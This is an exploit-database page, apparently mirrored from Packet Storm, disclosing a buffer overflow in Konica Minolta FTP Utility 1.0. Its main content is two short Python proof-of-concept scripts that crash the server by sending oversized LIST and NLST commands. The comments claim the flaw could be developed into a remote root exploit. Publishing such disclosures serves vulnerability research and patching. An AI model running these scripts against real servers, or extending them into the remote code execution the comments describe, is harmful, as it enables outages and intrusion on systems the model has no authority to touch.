Lucene search
K

Konica Minolta FTP Utility 1.0 Denial Of Service

🗓️ 16 May 2020 00:00:00Reported by Socket_0x03Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 142 Views

Konica Minolta FTP Utility 1.0 Denial Of Service due to Buffer Overflo

Code
`# Exploit Title: Konica Minolta FTP Utility v1.0 - 'LIST' Denial of Service (PoC) v2  
# Date: [05-16-2020]  
#  
# Found by: Alvaro J. Gene (Socket_0x03)  
# Email: Socket_0x03 (at) teraexe (dot) com  
# Website: www (dot) teraexe (dot) com  
#  
# Vulnerable Application: Konica Minolta FTP Utility  
# Version: 1.0  
# Server: FTP Server  
# Vulnerable Command: LIST  
# Tested on: Windows 7 SP1  
#   
# Impact: There is a buffer overflow vulnerability in the LIST command of the FTP server  
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers,   
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite   
# some registers, an individual can use the vulnerable command to build a remote buffer   
# overflow exploit that will root a system without any user interaction.   
  
  
ftp = FTP('192.168.0.16')  
  
buffer = "A" * 1500  
  
ftp.login()  
  
ftp.retrlines('LIST ' + buffer)  
  
  
  
  
# Exploit Title: Konica Minolta FTP Utility v1.0 - 'NLST' Denial of Service (PoC) v2  
# Date: [05-16-2020]  
#  
# Found by: Alvaro J. Gene (Socket_0x03)  
# Email: Socket_0x03 (at) teraexe (dot) com  
# Website: www (dot) teraexe (dot) com  
#  
# Vulnerable Application: Konica Minolta FTP Utility  
# Version: 1.0  
# Server: FTP Server  
# Vulnerable Command: NLST  
# Tested on: Windows 7 SP1  
#   
# Impact: There is a buffer overflow vulnerability in the NLST command of the FTP server  
# "Konica Minolta FTP Utility" that will allow an attacker to overwrite some registers,   
# such as EAX, ESI, EDI... Even though the next codes will crash the FTP server and overwrite   
# some registers, an individual can use the vulnerable command to build a remote buffer   
# overflow exploit that will root a system without any user interaction.   
  
  
from ftplib import FTP  
  
ftp = FTP('192.168.0.16')  
  
buffer = "A" * 1500  
  
ftp.login()  
  
ftp.retrlines('NLST ' + buffer)  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation